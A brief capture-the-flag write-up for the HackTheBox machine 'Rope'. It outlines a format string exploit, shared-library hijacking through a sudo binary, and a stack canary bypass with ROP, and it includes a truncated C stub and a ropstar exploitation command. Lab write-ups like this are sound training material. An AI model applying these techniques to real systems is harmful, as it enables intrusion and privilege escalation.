Rope @ HackTheBox

Rope @ HackTheBox

Rope is a 50-point machine on HackTheBox that involves 3 binary exploits. There is a format string vulnerability in the boxes’s webserver and a replaceable shared library used by a binary we can run with sudo. Finally there is another binary where we have to bypass a stack canary and use ROP.


The user exploit.

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

void printlog(){

The root exploit.

Solving with ropstar:

python3 ~/tools/ropstar/ -rhost localhost -rport 1337 -remote_offset ./contact

Thanks r4j for creating this fun box!

Share this post